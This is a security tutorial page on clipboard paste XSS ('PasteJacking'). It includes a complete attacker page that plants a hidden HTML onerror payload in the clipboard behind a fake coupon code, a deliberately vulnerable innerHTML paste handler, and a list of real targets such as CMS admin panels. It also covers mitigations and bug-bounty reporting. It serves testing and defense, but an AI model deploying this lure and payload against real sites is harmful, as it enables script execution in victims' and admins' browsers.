Blind XSS via PasteJacking

Clipboard Paste XSS (PasteJacking) abuses how web apps handle content pasted from the clipboard. When HTML is read from paste events and inserted directly into the DOM via innerHTML without sanitization, attackers can execute JavaScript in the victim's browser — and if stored, trigger Blind XSS against admins.

9 Categories18 CommandsCopy Ready

Intro

Introduction

1 commands

1Lesser-known XSS variant that exploits how apps handle pasted content from the user's clipboard.

Clipboard Paste XSS (PasteJacking) occurs when a web app accepts HTML content from the clipboard during a paste event and inserts it directly into the DOM using innerHTML without sanitization.

Step 1

Attack Flow — Attacker Prepares Malicious Page

1 commands

1#1 Attacker page — copies HTML payload + plain text to clipboard. Victim sees 'SALE2025' but hidden HTML payload is also stored.

<!doctype html>
<html><head><title>Super Sale - Coupons</title></head>
<body>
<div class="card"><h1>Mega Sale Coupon</h1>
<p>Click to copy your exclusive coupon code!</p>
<button id="copy">Copy Coupon</button></div>
<script>
const htmlPayload = '<img src=x onerror="alert('XSS via paste')">';
document.getElementById('copy').addEventListener('click', () => {
  const onCopy = e => {
    e.clipboardData.setData('text/html', htmlPayload);
    e.clipboardData.setData('text/plain', 'SALE2025');
    e.preventDefault();
    document.removeEventListener('copy', onCopy);
  };
  document.addEventListener('copy', onCopy);
  document.execCommand('copy');
  alert('Coupon copied! Paste it into the store checkout box.');
});
</script></body></html>

Step 2

Attack Flow — Victim Pastes on Vulnerable Site

1 commands

1#2 Vulnerable paste handler — reads text/html from clipboard, inserts directly with innerHTML. Payload executes immediately.

element.addEventListener('paste', e => {
  const html = e.clipboardData.getData('text/html') || e.clipboardData.getData('text/plain');
  e.preventDefault();
  element.innerHTML = html; // Dangerous
});

Step 4

Proof of Concept — Vulnerable Page (victim.html)

1 commands

1PoC victim page — contenteditable div with vulnerable paste handler. Open copy.html → click Copy → paste into victim.html → XSS fires.

<!doctype html>
<html><head><title>Checkout - Apply Coupon</title></head>
<body>
<div class="checkout-box"><h2>Apply Your Coupon</h2>
<div id="box" contenteditable="true"></div>
<p>Click inside the box and press Ctrl+V to paste your coupon.</p></div>
<script>
const box = document.getElementById('box');
box.addEventListener('paste', e => {
  const html = e.clipboardData.getData('text/html') || e.clipboardData.getData('text/plain');
  e.preventDefault();
  box.innerHTML = html; // Vulnerable
});
</script></body></html>

Step 5

Where to Test in Real Applications

5 commands

1#1 Rich text editors in blog/CMS comment sections

Comment systems with formatting options

2#2 Slack-like apps, support chat, CRM messaging

Chat or messaging platforms that allow rich text

3#3 Ticket description fields with WYSIWYG editors

Support ticket or CRM tools

4#4 WordPress, Drupal, Joomla admin interfaces

CMS admin panels (content editors)

5Only affects contenteditable divs or rich-text editors that read text/html

Won't work in simple <input> or <textarea> — those only accept plain text.

Step 6

Mitigation Strategies

4 commands

1#1 Force plain-text paste — use textContent instead of innerHTML

element.addEventListener('paste', e => {
  e.preventDefault();
  const text = e.clipboardData.getData('text/plain');
  element.textContent = text; // Safe
});

2#2 Sanitize HTML with DOMPurify if rich text is required

const clean = DOMPurify.sanitize(html); element.innerHTML = clean;

3#3 Strong CSP — disallow inline scripts and dangerous URL schemes

Content-Security-Policy: script-src 'self'; block data: and javascript: URLs

4#4 Developer awareness is the first step to prevention

Educate developers — paste events can contain HTML, not just plain text.

Step 7

Reporting Tips (Bug Bounty / Pentest)

1 commands

1Complete report template for PasteJacking XSS findings

1. Steps to reproduce (attacker PoC + paste action) 2. Screenshots/video showing XSS firing 3. Impact statement: highlight Blind XSS in admin panels 4. Suggested fix: enforce plain text or sanitize HTML

Step 8

Conclusion

1 commands

1Lesser-known but powerful XSS variant — test contenteditable fields and WYSIWYG editors with HTML clipboard payloads

Clipboard Paste XSS (PasteJacking) exploits paste actions to trigger XSS. Rich-text editors and admin panels are common targets. Recognizing this helps bug hunters find Blind XSS and guides developers to implement safer paste handling.

Tools

Tools & Resources

DOMPurify

HTML sanitization library — prevents XSS from clipboard paste

xss.report

Blind XSS callback service for receiving XSS triggers

Interactsh

Out-of-band interaction tool for blind XSS detection

Blind XSS via PasteJacking

9 Categories18 CommandsCopy Ready

Blind XSS via PasteJacking

Introduction

Attack Flow — Attacker Prepares Malicious Page

Attack Flow — Victim Pastes on Vulnerable Site

Attack Flow — Blind XSS Scenario

Proof of Concept — Vulnerable Page (victim.html)

Where to Test in Real Applications

Mitigation Strategies

Reporting Tips (Bug Bounty / Pentest)

Conclusion

Tools & Resources

Blind XSS via PasteJacking

Introduction

Attack Flow — Attacker Prepares Malicious Page

Attack Flow — Victim Pastes on Vulnerable Site

Attack Flow — Blind XSS Scenario

Proof of Concept — Vulnerable Page (victim.html)

Where to Test in Real Applications

Mitigation Strategies

Reporting Tips (Bug Bounty / Pentest)

Conclusion

Tools & Resources